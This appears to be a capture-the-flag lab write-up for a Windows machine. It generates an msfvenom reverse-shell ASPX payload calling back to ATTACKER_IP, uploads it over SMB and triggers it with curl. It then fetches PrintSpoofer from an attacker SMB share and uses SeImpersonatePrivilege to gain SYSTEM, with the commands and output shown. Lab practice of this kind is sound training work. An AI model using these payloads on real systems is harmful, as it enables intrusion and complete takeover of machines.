Relevant
MSFVENOM
- Generating the PAYLOAD with MSFvenom after that we can Upload it to the SMB Share.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -f aspx > Rev_ASPX.aspx
SMB
- Uploading the Reverse Shell Using
SMB.
smb: \> put Rev_ASPX.aspx
Privilege Escalation
- We can Execute the Reverse Shell by Navigating to the Target URL from the Browser or from the Command Line with
curlor any other alternative.
attacker@machine:~$ curl "10.10.180.65:49663/nt4wrksv/Rev_ASPX.aspx"
- We can catch the Reverse Shell Using
netcat - These Privileges allow a Process to
Impersonateother Users and act on their behalf: [SeImpersonate - SeAssignPrimaryToken] - We can use PrintSpoofer to accomplish this Task.
c:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
[..]
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
[..]
SMB
- Using a Python
SMBServer to Transfer Files to the Target Machine.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare
- Copying
PrintSpoofer64from ourSMBServer to the Target Machine.
C:\Windows\Temp> copy \\$ATTACKER_IP\LINUXSHARE\PrintSpoofer64.exe PrintSpoofer64.exe
Exploitation
PrintSpoofer Multiple Times Before Succeeding- Executing the PrintSpoofer64.exe Binary.
- We have System Rights: NT AUTHORITY\SYSTEM
C:\Windows\Temp> PrintSpoofer64.exe -i -c powershell
PrintSpoofer64.exe -i -c powershell
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system